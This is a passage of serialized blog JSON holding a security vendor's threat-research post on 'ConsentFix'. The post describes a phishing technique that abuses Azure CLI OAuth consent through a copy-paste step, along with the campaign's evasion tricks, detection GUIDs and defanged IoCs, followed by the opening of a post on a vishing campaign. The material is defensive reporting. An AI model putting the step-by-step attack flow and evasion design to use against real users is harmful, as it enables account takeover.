attacks.","2025-11-13T00:00:00.000Z","scattered-lapsus-hunters",{"items":2257},[2258,2260],{"sys":2259,"name":1270},{"id":1269},{"sys":2261,"name":1274},{"id":1273},{"items":2263},[2264],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":2268},"Dan Green","Dan","Threat Research",{"url":2269},"https://images.ctfassets.net/y1cdw1ablpvd/7jik1VhFgA3kgzXBXTm2Vw/fcd8c171da644903d0827eafcfbcaad0/Dan_Headshot_2025.png",{"__typename":1278,"sys":2271,"content":2273,"title":3125,"synopsis":3126,"hashTags":118,"publishedDate":3127,"slug":3128,"tagsCollection":3129,"authorsCollection":3135},{"id":2272},"71EaaK7lfl6bQBbkAU0qjv",{"json":2274},{"nodeType":1259,"data":2275,"content":2276},{},[2277,2285,2292,2299,2306,2318,2325,2331,2337,2340,2348,2355,2362,2368,2388,2395,2401,2408,2414,2421,2464,2470,2476,2483,2490,2493,2501,2521,2528,2534,2553,2559,2579,2586,2589,2597,2604,2649,2661,2664,2672,2691,2698,2714,2721,2728,2734,2741,2744,2752,2759,2812,2819,2822,2830,2836,2843,2850,2856,2863,2896,2903,2910,2916,2923,2929,2937,2957,2964,2997,3004,3037,3040,3048,3055,3061,3080,3087,3113,3119],{"nodeType":1311,"data":2278,"content":2279},{},[2280],{"nodeType":1257,"value":2281,"marks":2282,"data":2284},"Introducing “ConsentFix” — a new kind of phishing attack",[2283],{"type":1318},{},{"nodeType":1258,"data":2286,"content":2287},{},[2288],{"nodeType":1257,"value":2289,"marks":2290,"data":2291},"The Push browser agent recently detected and blocked a new attack technique seen targeting several Push customers. ",[],{},{"nodeType":1258,"data":2293,"content":2294},{},[2295],{"nodeType":1257,"value":2296,"marks":2297,"data":2298},"This is a new kind of browser-based attack technique that takes over user accounts with a simple copy and paste. If you’re already logged into the app in your browser, you don’t even need to supply creds, or pass an MFA check — meaning it effectively circumvents phishing-resistant auth like passkeys too.",[],{},{"nodeType":1258,"data":2300,"content":2301},{},[2302],{"nodeType":1257,"value":2303,"marks":2304,"data":2305},"This is so different from the AiTM phish kits we usually come up against that we felt it deserved a new name. ",[],{},{"nodeType":1258,"data":2307,"content":2308},{},[2309,2314],{"nodeType":1257,"value":2310,"marks":2311,"data":2313},"Enter: ConsentFix. ",[2312],{"type":1318},{},{"nodeType":1257,"value":2315,"marks":2316,"data":2317},"This attack shares a lot of similarities with ClickFix/FileFix, AiTM phishing, and OAuth Consent Phishing. You can think of this as a browser-native ClickFix attack that phishes an OAuth token on a target app by getting the victim to copy and paste a URL containing OAuth key material into a phishing page. ",[],{},{"nodeType":1258,"data":2319,"content":2320},{},[2321],{"nodeType":1257,"value":2322,"marks":2323,"data":2324},"The campaign we detected looks to be specifically targeting Microsoft accounts by abusing the Azure CLI OAuth app. Essentially, the attacker tricks the victim into logging into Azure CLI, by generating an OAuth authorization code — visible in a localhost URL — and then pasting that URL (including the code) into an attacker-controlled page. This then creates an OAuth connection between the victim’s Microsoft account and the attacker’s Azure CLI instance. ",[],{},{"nodeType":1335,"data":2326,"content":2330},{"target":2327},{"sys":2328},{"id":2329,"type":1340,"linkType":1341},"5GTnqWIbmraz8HZeHMybrP",[],{"nodeType":1335,"data":2332,"content":2336},{"target":2333},{"sys":2334},{"id":2335,"type":1340,"linkType":1341},"1lcjX5q3b1bsuhyOXKvJpW",[],{"nodeType":1307,"data":2338,"content":2339},{},[],{"nodeType":1311,"data":2341,"content":2342},{},[2343],{"nodeType":1257,"value":2344,"marks":2345,"data":2347},"How ConsentFix works",[2346],{"type":1318},{},{"nodeType":1258,"data":2349,"content":2350},{},[2351],{"nodeType":1257,"value":2352,"marks":2353,"data":2354},"In all of the examples we saw, the victim accessed a malicious or compromised webpage via Google Search. The vast majority of the sites we’ve seen associated with the campaign are legitimate, compromised websites with high domain reputation that are easily findable via search engines.",[],{},{"nodeType":1258,"data":2356,"content":2357},{},[2358],{"nodeType":1257,"value":2359,"marks":2360,"data":2361},"The attacker had injected a fake Cloudflare Turnstile into the compromised websites, requiring an email address to be supplied in order to proceed. ",[],{},{"nodeType":1335,"data":2363,"content":2367},{"target":2364},{"sys":2365},{"id":2366,"type":1340,"linkType":1341},"39jEjeLqOYIkGc4o9w3MuX",[],{"nodeType":1258,"data":2369,"content":2370},{},[2371,2375,2384],{"nodeType":1257,"value":2372,"marks":2373,"data":2374},"This acted as a form of ",[],{},{"nodeType":1364,"data":2376,"content":2378},{"uri":2377},"https://phishing-techniques.pushsecurity.com/techniques/conditional-loading/",[2379],{"nodeType":1257,"value":2380,"marks":2381,"data":2383},"conditional loading",[2382],{"type":1372},{},{"nodeType":1257,"value":2385,"marks":2386,"data":2387}," that would only continue if a valid email address and domain was supplied, designed to prevent the page from being analysed by security bots, analysts, and low-value accounts that run the risk of exposing the campaign before the intended recipient(s) can be phished. ",[],{},{"nodeType":1258,"data":2389,"content":2390},{},[2391],{"nodeType":1257,"value":2392,"marks":2393,"data":2394},"If a domain not on the target list was provided, the victim was passed back to the original website and the attack did not progress to the next stage. Further, once the check has concluded per IP, the phishing page will no longer activate, even a different email is provided.  ",[],{},{"nodeType":1335,"data":2396,"content":2400},{"target":2397},{"sys":2398},{"id":2399,"type":1340,"linkType":1341},"7ttmGnTzi9j87tBXfyFcOA",[],{"nodeType":1258,"data":2402,"content":2403},{},[2404],{"nodeType":1257,"value":2405,"marks":2406,"data":2407},"After entering an approved email address, the next stage was loaded, prompting the victim to complete a set of instructions on the page to continue.",[],{},{"nodeType":1335,"data":2409,"content":2413},{"target":2410},{"sys":2411},{"id":2412,"type":1340,"linkType":1341},"2oHYNoMgAz6MdgLlcWjbaB",[],{"nodeType":1258,"data":2415,"content":2416},{},[2417],{"nodeType":1257,"value":2418,"marks":2419,"data":2420},"To complete the attack, the victim must:",[],{},{"nodeType":1884,"data":2422,"content":2423},{},[2424,2434,2444,2454],{"nodeType":1888,"data":2425,"content":2426},{},[2427],{"nodeType":1258,"data":2428,"content":2429},{},[2430],{"nodeType":1257,"value":2431,"marks":2432,"data":2433},"Click the “Sign In” button. This opens a new tab that loads a legitimate Microsoft URL associated with the user account/email used to access the page.",[],{},{"nodeType":1888,"data":2435,"content":2436},{},[2437],{"nodeType":1258,"data":2438,"content":2439},{},[2440],{"nodeType":1257,"value":2441,"marks":2442,"data":2443},"If the user is already logged into Microsoft in their browser, they simply need to select their MS account from the dropdown. Otherwise, they will be required to login via the legitimate Microsoft login URL (no phishing takes place at this stage). ",[],{},{"nodeType":1888,"data":2445,"content":2446},{},[2447],{"nodeType":1258,"data":2448,"content":2449},{},[2450],{"nodeType":1257,"value":2451,"marks":2452,"data":2453},"Once logged into legit Microsoft or the account is selected from the dropdown, the user is redirected to localhost, which generates a URL containing a code associated with the user’s Microsoft account. ",[],{},{"nodeType":1888,"data":2455,"content":2456},{},[2457],{"nodeType":1258,"data":2458,"content":2459},{},[2460],{"nodeType":1257,"value":2461,"marks":2462,"data":2463},"To complete the phish, the victim copies the URL and pastes it onto the original page. ",[],{},{"nodeType":1335,"data":2465,"content":2469},{"target":2466},{"sys":2467},{"id":2468,"type":1340,"linkType":1341},"7zendMbmCViGwtEpUQvq6y",[],{"nodeType":1335,"data":2471,"content":2475},{"target":2472},{"sys":2473},{"id":2474,"type":1340,"linkType":1341},"1eZOs7hXi9FzCE92QEP6xh",[],{"nodeType":1258,"data":2477,"content":2478},{},[2479],{"nodeType":1257,"value":2480,"marks":2481,"data":2482},"Once the steps are completed, the victim has granted the attacker access to their Microsoft account via Azure CLI. ",[],{},{"nodeType":1258,"data":2484,"content":2485},{},[2486],{"nodeType":1257,"value":2487,"marks":2488,"data":2489},"At this point, the attacker has effective control of the victim’s Microsoft account, but without ever needing to phish a password, or pass an MFA check. In fact, if the user was already logged in to their Microsoft account (i.e. they had an active session) no login is required at all. ",[],{},{"nodeType":1307,"data":2491,"content":2492},{},[],{"nodeType":1311,"data":2494,"content":2495},{},[2496],{"nodeType":1257,"value":2497,"marks":2498,"data":2500},"The next evolution of ClickFix?",[2499],{"type":1318},{},{"nodeType":1258,"data":2502,"content":2503},{},[2504,2508,2517],{"nodeType":1257,"value":2505,"marks":2506,"data":2507},"When we presented ",[],{},{"nodeType":1364,"data":2509,"content":2511},{"uri":2510},"https://pushsecurity.com/webinar/clickfix",[2512],{"nodeType":1257,"value":2513,"marks":2514,"data":2516},"our last webinar on ClickFix",[2515],{"type":1372},{},{"nodeType":1257,"value":2518,"marks":2519,"data":2520},", we predicted that the next evolution of the attack would happen entirely within the browser context. This is because any attack that touches the endpoint (a traditionally much better protected surface) is way more likely to be detected. And with many ClickFix attacks being used to deliver infostealer malware, these attacks are really trying to get back into the browser anyway — to steal credentials and sessions stored there. ",[],{},{"nodeType":1258,"data":2522,"content":2523},{},[2524],{"nodeType":1257,"value":2525,"marks":2526,"data":2527},"Let’s take a closer look at the page — if you follow Push research, you might be getting déjà vu. ",[],{},{"nodeType":1335,"data":2529,"content":2533},{"target":2530},{"sys":2531},{"id":2532,"type":1340,"linkType":1341},"1vMZCJ92IxFdR1EzzCOOvb",[],{"nodeType":1258,"data":2535,"content":2536},{},[2537,2541,2550],{"nodeType":1257,"value":2538,"marks":2539,"data":2540},"We’ve seen this kind of embedded video player before (albeit a slicker looking one) that we blogged about as ",[],{},{"nodeType":1364,"data":2542,"content":2544},{"uri":2543},"https://pushsecurity.com/blog/the-most-advanced-clickfix-yet/",[2545],{"nodeType":1257,"value":2546,"marks":2547,"data":2549},"the most advanced ClickFix we’d seen",[2548],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":2551,"data":2552},[],{},{"nodeType":1335,"data":2554,"content":2558},{"target":2555},{"sys":2556},{"id":2557,"type":1340,"linkType":1341},"ID7VKJNOZk729P5zBOBjZ",[],{"nodeType":1258,"data":2560,"content":2561},{},[2562,2566,2575],{"nodeType":1257,"value":2563,"marks":2564,"data":2565},"Another similarity with ClickFix campaigns we’ve investigated is the use of Google Search as a delivery vector. 4 in 5 ClickFix attacks intercepted by Push came via Google Search, with attackers using ",[],{},{"nodeType":1364,"data":2567,"content":2569},{"uri":2568},"https://phishing-techniques.pushsecurity.com/techniques/malvertising/",[2570],{"nodeType":1257,"value":2571,"marks":2572,"data":2574},"malvertising",[2573],{"type":1372},{},{"nodeType":1257,"value":2576,"marks":2577,"data":2578}," and either compromised or custom vibe-coded websites to intercept users as they browse the internet. ",[],{},{"nodeType":1258,"data":2580,"content":2581},{},[2582],{"nodeType":1257,"value":2583,"marks":2584,"data":2585},"So it seems highly likely that this is a kind of browser-native evolution of ClickFix that shares many elements with typical ClickFix attacks, and is probably used by the same groups of attackers.",[],{},{"nodeType":1307,"data":2587,"content":2588},{},[],{"nodeType":1311,"data":2590,"content":2591},{},[2592],{"nodeType":1257,"value":2593,"marks":2594,"data":2596},"OAuth shenanigans via Azure CLI",[2595],{"type":1318},{},{"nodeType":1258,"data":2598,"content":2599},{},[2600],{"nodeType":1257,"value":2601,"marks":2602,"data":2603},"The clever use of Azure CLI and OAuth consent abuse is another clever iteration on previous techniques. ",[],{},{"nodeType":1258,"data":2605,"content":2606},{},[2607,2611,2620,2623,2632,2636,2645],{"nodeType":1257,"value":2608,"marks":2609,"data":2610},"We’ve previously seen ",[],{},{"nodeType":1364,"data":2612,"content":2614},{"uri":2613},"https://phishing-techniques.pushsecurity.com/techniques/consent-phishing/",[2615],{"nodeType":1257,"value":2616,"marks":2617,"data":2619},"consent phishing",[2618],{"type":1372},{},{"nodeType":1257,"value":1703,"marks":2621,"data":2622},[],{},{"nodeType":1364,"data":2624,"content":2626},{"uri":2625},"https://phishing-techniques.pushsecurity.com/techniques/device-code-phishing/",[2627],{"nodeType":1257,"value":2628,"marks":2629,"data":2631},"device code phishing",[2630],{"type":1372},{},{"nodeType":1257,"value":2633,"marks":2634,"data":2635}," attacks where attackers have tricked victims into connecting malicious external apps into their tenant via OAuth, but this is becoming increasingly difficult in core enterprise cloud environments like Azure due to ",[],{},{"nodeType":1364,"data":2637,"content":2639},{"uri":2638},"https://learn.microsoft.com/en-us/microsoft-365/admin/misc/user-consent?view=o365-worldwide",[2640],{"nodeType":1257,"value":2641,"marks":2642,"data":2644},"stricter default configs",[2643],{"type":1372},{},{"nodeType":1257,"value":2646,"marks":2647,"data":2648},". However, since Azure CLI is a first-party Microsoft app, it is implicitly trusted in Entra ID, and is excluded from these restrictions. ",[],{},{"nodeType":1258,"data":2650,"content":2651},{},[2652,2656],{"nodeType":1257,"value":2653,"marks":2654,"data":2655},"First-party apps like Azure CLI are trusted by default in all tenants, allowed to request permissions without admin approval, and cannot be deleted or blocked. They can also be granted special permissions, such as tenant-wide service permissions (without needing admin approval), use of legacy or undocumented graph scopes, internal scopes for Microsoft client operations, and permissions for Office/Entra admin functions. ",[],{},{"nodeType":1257,"value":2657,"marks":2658,"data":2660},"This makes Azure CLI a prime target for attackers, and significantly more exploitable than when connecting a third-party app. ",[2659],{"type":1318},{},{"nodeType":1307,"data":2662,"content":2663},{},[],{"nodeType":1311,"data":2665,"content":2666},{},[2667],{"nodeType":1257,"value":2668,"marks":2669,"data":2671},"Advanced detection evasion techniques",[2670],{"type":1318},{},{"nodeType":1258,"data":2673,"content":2674},{},[2675,2679,2687],{"nodeType":1257,"value":2676,"marks":2677,"data":2678},"This campaign features some of the most advanced ",[],{},{"nodeType":1364,"data":2680,"content":2682},{"uri":2681},"https://phishing-techniques.pushsecurity.com/",[2683],{"nodeType":1257,"value":2684,"marks":2685,"data":2686},"detection evasion techniques",[],{},{"nodeType":1257,"value":2688,"marks":2689,"data":2690}," we've seen in the wild. ",[],{},{"nodeType":1258,"data":2692,"content":2693},{},[2694],{"nodeType":1257,"value":2695,"marks":2696,"data":2697},"As well as the use of Google Search to deliver the lure, and bot protection to prevent security tools from analysing the page, there were multiple layers of anti-analysis techniques to navigate.",[],{},{"nodeType":1258,"data":2699,"content":2700},{},[2701,2705,2710],{"nodeType":1257,"value":2702,"marks":2703,"data":2704},"We already mentioned the use of selective targeting based on email addresses and domain names. But all sites involved in the campaign also have synchronized IP blocking — meaning if you visit one site and are served one of the associated phishing pages, the phish will never be served again, ",[],{},{"nodeType":1257,"value":2706,"marks":2707,"data":2709},"across any of the sites linked to the campaign",[2708],{"type":1318},{},{"nodeType":1257,"value":2711,"marks":2712,"data":2713},". When you visit any of the sites again, the phish won't trigger, and it can be browsed as normal. ",[],{},{"nodeType":1258,"data":2715,"content":2716},{},[2717],{"nodeType":1257,"value":2718,"marks":2719,"data":2720},"On the backend, there are multiple checks based on your IP and identifiers unique to your session. Unless all of the conditions are met, certain JavaScript packages won't be served — preventing full inspection of the page to detect malicious elements. ",[],{},{"nodeType":1258,"data":2722,"content":2723},{},[2724],{"nodeType":1257,"value":2725,"marks":2726,"data":2727},"If the conditions aren't met, the page may not load the Cloudflare Turnstile check at all, or will redirect you back to the site to continue browsing as normal.",[],{},{"nodeType":1335,"data":2729,"content":2733},{"target":2730},{"sys":2731},{"id":2732,"type":1340,"linkType":1341},"5v0zDoscA6pYLBfkXrNtIH",[],{"nodeType":1258,"data":2735,"content":2736},{},[2737],{"nodeType":1257,"value":2738,"marks":2739,"data":2740},"All of these make it incredibly hard to detect and block these attacks ahead of time when relying on URL-based checks and traffic analysis.",[],{},{"nodeType":1307,"data":2742,"content":2743},{},[],{"nodeType":1311,"data":2745,"content":2746},{},[2747],{"nodeType":1257,"value":2748,"marks":2749,"data":2751},"Key takeaways",[2750],{"type":1318},{},{"nodeType":1258,"data":2753,"content":2754},{},[2755],{"nodeType":1257,"value":2756,"marks":2757,"data":2758},"ConsentFix is a dangerous evolution of ClickFix and consent phishing that is incredibly hard for traditional security tools to detect and block, as:",[],{},{"nodeType":1884,"data":2760,"content":2761},{},[2762,2772,2782,2792,2802],{"nodeType":1888,"data":2763,"content":2764},{},[2765],{"nodeType":1258,"data":2766,"content":2767},{},[2768],{"nodeType":1257,"value":2769,"marks":2770,"data":2771},"The attack happens entirely inside the browser context, removing one of the key detection opportunities for ClickFix (because it doesn’t touch the endpoint).",[],{},{"nodeType":1888,"data":2773,"content":2774},{},[2775],{"nodeType":1258,"data":2776,"content":2777},{},[2778],{"nodeType":1257,"value":2779,"marks":2780,"data":2781},"Delivering the lure via a Google Search watering hole attack completely circumvents email-based anti-phishing controls.",[],{},{"nodeType":1888,"data":2783,"content":2784},{},[2785],{"nodeType":1258,"data":2786,"content":2787},{},[2788],{"nodeType":1257,"value":2789,"marks":2790,"data":2791},"Targeting a first-party app like Azure CLI means that many of the mitigating controls available for third-party app integrations do not apply — making this attack way harder to prevent.",[],{},{"nodeType":1888,"data":2793,"content":2794},{},[2795],{"nodeType":1258,"data":2796,"content":2797},{},[2798],{"nodeType":1257,"value":2799,"marks":2800,"data":2801},"Because there’s no login required, phishing-resistant authentication controls like passkeys have no impact on this attack. ",[],{},{"nodeType":1888,"data":2803,"content":2804},{},[2805],{"nodeType":1258,"data":2806,"content":2807},{},[2808],{"nodeType":1257,"value":2809,"marks":2810,"data":2811},"The use of advanced detection evasion techniques makes this attack difficult to investigate, meaning these attacks are going undetected. ",[],{},{"nodeType":1258,"data":2813,"content":2814},{},[2815],{"nodeType":1257,"value":2816,"marks":2817,"data":2818},"We’re sure to see more examples of ConsentFix in future. We’ll be monitoring to see how attackers adapt in terms of integrating these capabilities with common as-a-Service offerings to make them more widespread, and whether the scope extends further beyond Microsoft / Azure CLI targets in the future to target other enterprise cloud ecosystems. ",[],{},{"nodeType":1307,"data":2820,"content":2821},{},[],{"nodeType":1311,"data":2823,"content":2824},{},[2825],{"nodeType":1257,"value":2826,"marks":2827,"data":2829},"Recommendations",[2828],{"type":1318},{},{"nodeType":1335,"data":2831,"content":2835},{"target":2832},{"sys":2833},{"id":2834,"type":1340,"linkType":1341},"3aBCwdB2aNnLRxRN5RrshC",[],{"nodeType":1258,"data":2837,"content":2838},{},[2839],{"nodeType":1257,"value":2840,"marks":2841,"data":2842},"On the backend, exploitation of this attack will lead to login events being observed to the Microsoft Azure CLI app. It’s likely that any legitimate use of this will most likely be limited to system administrators and possibly developers. Therefore, logins outside of these groups will be inherently more suspicious.",[],{},{"nodeType":1258,"data":2844,"content":2845},{},[2846],{"nodeType":1257,"value":2847,"marks":2848,"data":2849},"Additionally, it’s possible that aspects of the logins themselves will be different between legitimate Azure CLI use and exploitation of this attack. For example, see the following logs from a lab environment. The login events with an application of  “Microsoft Azure CLI” and a resource of “Azure Resource Manager” was legitimate use of the Azure CLI using the powershell CLI framework. Conversely, the login event with the Resource of “Windows Azure Active Directory” was produced by logging in using the method used by the phishing kit.",[],{},{"nodeType":1335,"data":2851,"content":2855},{"target":2852},{"sys":2853},{"id":2854,"type":1340,"linkType":1341},"6ie0nkk6XbgwidfwmiGwL4",[],{"nodeType":1258,"data":2857,"content":2858},{},[2859],{"nodeType":1257,"value":2860,"marks":2861,"data":2862},"There is no guarantee this can be used to differentiate between legitimate and malicious examples, but it’s another data point to consider. If searching logs you may wish to use the respective GUIDs for these:",[],{},{"nodeType":1884,"data":2864,"content":2865},{},[2866,2881],{"nodeType":1888,"data":2867,"content":2868},{},[2869],{"nodeType":1258,"data":2870,"content":2871},{},[2872,2877],{"nodeType":1257,"value":2873,"marks":2874,"data":2876},"Application ID",[2875],{"type":1318},{},{"nodeType":1257,"value":2878,"marks":2879,"data":2880}," = 04b07795-8ddb-461a-bbee-02f9e1bf7b46",[],{},{"nodeType":1888,"data":2882,"content":2883},{},[2884],{"nodeType":1258,"data":2885,"content":2886},{},[2887,2892],{"nodeType":1257,"value":2888,"marks":2889,"data":2891},"Resource ID",[2890],{"type":1318},{},{"nodeType":1257,"value":2893,"marks":2894,"data":2895}," = 00000002-0000-0000-c000-000000000000",[],{},{"nodeType":1258,"data":2897,"content":2898},{},[2899],{"nodeType":1257,"value":2900,"marks":2901,"data":2902},"For interactive logins, like above, you cannot rely on looking for logins from suspicious IP addresses or locations. The login itself occurs from the victims browser directly to Microsoft, and so the IP addresses associated with these events will be the legitimate IP used by the target user, not by the threat actor. ",[],{},{"nodeType":1258,"data":2904,"content":2905},{},[2906],{"nodeType":1257,"value":2907,"marks":2908,"data":2909},"However, for non-interactive logins and other audit logs for actions taken, you may be able to uncover unusual IP addresses that differ from the original interactive login. For example, here are some non-interactive logins that were observed immediately after compromise that came from different IP addresses in both the US and Indonesia.",[],{},{"nodeType":1335,"data":2911,"content":2915},{"target":2912},{"sys":2913},{"id":2914,"type":1340,"linkType":1341},"TD3YeWqgGIWIWM8FRHU4o",[],{"nodeType":1258,"data":2917,"content":2918},{},[2919],{"nodeType":1257,"value":2920,"marks":2921,"data":2922},"Interestingly, they differ in which resources they accessed, with one accessing the Windows Azure Active Directory resource ID like the interactive login, but two others accessing the Microsoft Intune Checkin resource ID. ",[],{},{"nodeType":1335,"data":2924,"content":2928},{"target":2925},{"sys":2926},{"id":2927,"type":1340,"linkType":1341},"57PqDQiAiwzqkspVpROQXb",[],{"nodeType":1468,"data":2930,"content":2931},{},[2932],{"nodeType":1257,"value":2933,"marks":2934,"data":2936},"IoCs",[2935],{"type":1318},{},{"nodeType":1258,"data":2938,"content":2939},{},[2940,2944,2953],{"nodeType":1257,"value":2941,"marks":2942,"data":2943},"Short-lived IoCs are of limited value when tackling modern phishing attacks due to the rate at which attackers are able to ",[],{},{"nodeType":1364,"data":2945,"content":2947},{"uri":2946},"https://phishing-techniques.pushsecurity.com/techniques/domain-rotation-redirection/",[2948],{"nodeType":1257,"value":2949,"marks":2950,"data":2952},"quickly spin up and rotate the sites used",[2951],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":2955,"data":2956}," in the attack chain, often dynamically serving different URLs to site visitors. ",[],{},{"nodeType":1258,"data":2958,"content":2959},{},[2960],{"nodeType":1257,"value":2961,"marks":2962,"data":2963},"That said, the domains used to deliver the final phishing payload were:",[],{},{"nodeType":1884,"data":2965,"content":2966},{},[2967,2977,2987],{"nodeType":1888,"data":2968,"content":2969},{},[2970],{"nodeType":1258,"data":2971,"content":2972},{},[2973],{"nodeType":1257,"value":2974,"marks":2975,"data":2976},"hxxps://trustpointassurance.com/",[],{},{"nodeType":1888,"data":2978,"content":2979},{},[2980],{"nodeType":1258,"data":2981,"content":2982},{},[2983],{"nodeType":1257,"value":2984,"marks":2985,"data":2986},"hxxps://fastwaycheck.com/",[],{},{"nodeType":1888,"data":2988,"content":2989},{},[2990],{"nodeType":1258,"data":2991,"content":2992},{},[2993],{"nodeType":1257,"value":2994,"marks":2995,"data":2996},"hxxps://previewcentral.com",[],{},{"nodeType":1258,"data":2998,"content":2999},{},[3000],{"nodeType":1257,"value":3001,"marks":3002,"data":3003},"In addition, we recommend hunting for connections from the following IPs in Azure logs:",[],{},{"nodeType":1884,"data":3005,"content":3006},{},[3007,3017,3027],{"nodeType":1888,"data":3008,"content":3009},{},[3010],{"nodeType":1258,"data":3011,"content":3012},{},[3013],{"nodeType":1257,"value":3014,"marks":3015,"data":3016},"12.75.216.90",[],{},{"nodeType":1888,"data":3018,"content":3019},{},[3020],{"nodeType":1258,"data":3021,"content":3022},{},[3023],{"nodeType":1257,"value":3024,"marks":3025,"data":3026},"182.3.36.223",[],{},{"nodeType":1888,"data":3028,"content":3029},{},[3030],{"nodeType":1258,"data":3031,"content":3032},{},[3033],{"nodeType":1257,"value":3034,"marks":3035,"data":3036},"12.75.116.137",[],{},{"nodeType":1307,"data":3038,"content":3039},{},[],{"nodeType":1311,"data":3041,"content":3042},{},[3043],{"nodeType":1257,"value":3044,"marks":3045,"data":3047},"How Push stopped the attack",[3046],{"type":1318},{},{"nodeType":1258,"data":3049,"content":3050},{},[3051],{"nodeType":1257,"value":3052,"marks":3053,"data":3054},"Even though this was a brand new technique, Push intercepted this attack and shut it down before customers could interact with it. ",[],{},{"nodeType":1335,"data":3056,"content":3060},{"target":3057},{"sys":3058},{"id":3059,"type":1340,"linkType":1341},"5YzpiQH974EYA5iPPZMXkV",[],{"nodeType":1258,"data":3062,"content":3063},{},[3064,3068,3076],{"nodeType":1257,"value":3065,"marks":3066,"data":3067},"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that Push sees what your users see. It doesn’t matter what ",[],{},{"nodeType":1364,"data":3069,"content":3070},{"uri":2681},[3071],{"nodeType":1257,"value":3072,"marks":3073,"data":3075},"delivery channel or camouflage methods are used",[3074],{"type":1372},{},{"nodeType":1257,"value":3077,"marks":3078,"data":3079},", Push shuts the attack down in real time, as the user loads the malicious page in their web browser.",[],{},{"nodeType":1258,"data":3081,"content":3082},{},[3083],{"nodeType":1257,"value":3084,"marks":3085,"data":3086},"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, malicious browser extensions, ClickFix, and session hijacking. You don’t need to wait until it all goes wrong — you can also use Push to proactively find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, and more to harden your identity attack surface.",[],{},{"nodeType":1258,"data":3088,"content":3089},{},[3090,3093,3100,3103,3110],{"nodeType":1257,"value":2223,"marks":3091,"data":3092},[],{},{"nodeType":1364,"data":3094,"content":3095},{"uri":2228},[3096],{"nodeType":1257,"value":2231,"marks":3097,"data":3099},[3098],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":3101,"data":3102},[],{},{"nodeType":1364,"data":3104,"content":3105},{"uri":2241},[3106],{"nodeType":1257,"value":2244,"marks":3107,"data":3109},[3108],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":3111,"data":3112},[],{},{"nodeType":1335,"data":3114,"content":3118},{"target":3115},{"sys":3116},{"id":3117,"type":1340,"linkType":1341},"6QzB0BlVC5mstXwXHvy2c3",[],{"nodeType":1258,"data":3120,"content":3121},{},[3122],{"nodeType":1257,"value":31,"marks":3123,"data":3124},[],{},"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants","Analysing \"ConsentFix\", a new browser-native attack technique we've detected in the wild, combining OAuth consent phishing with a ClickFix-style user prompt. ","2025-12-11T00:00:00.000Z","consentfix",{"items":3130},[3131,3133],{"sys":3132,"name":1270},{"id":1269},{"sys":3134,"name":1274},{"id":1273},{"items":3136},[3137],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":3141},"Luke Jennings","Luke","Vice President, R&D",{"url":3142},"https://images.ctfassets.net/y1cdw1ablpvd/4Hosb4zKi1dA0PUyDLMe1h/27e09d894861f2196ba794037986fb08/T016S22KZ96-U02NVQM7ZD4-57761d542d83-512.jpeg",{"__typename":1278,"sys":3144,"content":3146,"title":3763,"synopsis":3764,"hashTags":118,"publishedDate":3765,"slug":3766,"tagsCollection":3767,"authorsCollection":3773},{"id":3145},"44DXq5ZkL9XQV5Fngto0XZ",{"json":3147},{"nodeType":1259,"data":3148,"content":3149},{},[3150,3169,3176,3183,3186,3194,3214,3233,3267,3273,3276,3284,3292,3299,3317,3324,3329,3335,3342,3349,3357,3364,3371,3377,3384,3404,3412,3419,3426,3446,3452,3472,3478,3485,3491,3494,3502,3509,3528,3535,3564,3571,3579,3582,3590,3597,3604,3610,3617,3662,3668,3675,3707,3713,3757],{"nodeType":1258,"data":3151,"content":3152},{},[3153,3156,3165],{"nodeType":1257,"value":31,"marks":3154,"data":3155},[],{},{"nodeType":1364,"data":3157,"content":3159},{"uri":3158},"https://pushsecurity.com/blog/scattered-lapsus-hunters/",[3160],{"nodeType":1257,"value":3161,"marks":3162,"data":3164},"Scattered Lapsus$ Hunters",[3163],{"type":1372},{},{"nodeType":1257,"value":3166,"marks":3167,"data":3168}," are running a large-scale hybrid vishing plus AiTM phishing campaign across several industry verticals, targeting Okta, Entra, and Google SSO platforms. ",[],{},{"nodeType":1258,"data":3170,"content":3171},{},[3172],{"nodeType":1257,"value":3173,"marks":3174,"data":3175},"The attacks begin with the attacker calling their victim, impersonating IT staff from their company. They offer to help the employee set up passkeys for logging into the enterprise SSO service, tricking the victim into visiting a specially crafted adversary-in-the-middle phishing site that captures their SSO credentials, MFA codes, and ultimately live session access. ",[],{},{"nodeType":1258,"data":3177,"content":3178},{},[3179],{"nodeType":1257,"value":3180,"marks":3181,"data":3182},"Once an account is stolen, the attacker logs in to the SSO dashboard to see which platforms they have access to and then proceeds to steal data from them — with the ultimate goal of extorting victims. ",[],{},{"nodeType":1307,"data":3184,"content":3185},{},[],{"nodeType":1311,"data":3187,"content":3188},{},[3189],{"nodeType":1257,"value":3190,"marks":3191,"data":3193},"What we know",[3192],{"type":1318},{},{"nodeType":1258,"data":3195,"content":3196},{},[3197,3201,3210],{"nodeType":1257,"value":3198,"marks":3199,"data":3200},"To date, ",[],{},{"nodeType":1364,"data":3202,"content":3204},{"uri":3203},"https://www.silentpush.com/blog/slsh-alert/",[3205],{"nodeType":1257,"value":3206,"marks":3207,"data":3209},"100+ companies have been targeted",[3208],{"type":1372},{},{"nodeType":1257,"value":3211,"marks":3212,"data":3213},", with infrastructure and domains impersonating their brand to be used in legit-looking campaigns against them. The reality is that the list of targets could be more extensive, and will continue to increase over time. ",[],{},{"nodeType":1258,"data":3215,"content":3216},{},[3217,3221,3229],{"nodeType":1257,"value":3218,"marks":3219,"data":3220},"SLH ",[],{},{"nodeType":1364,"data":3222,"content":3223},{"uri":1696},[3224],{"nodeType":1257,"value":3225,"marks":3226,"data":3228},"claims to be using data stolen in previous breaches",[3227],{"type":1372},{},{"nodeType":1257,"value":3230,"marks":3231,"data":3232},", such as the widespread Salesforce data theft attacks reported in 2025, to identify and contact employees. This data includes phone numbers, job titles, names, and other details used to make the social engineering calls more 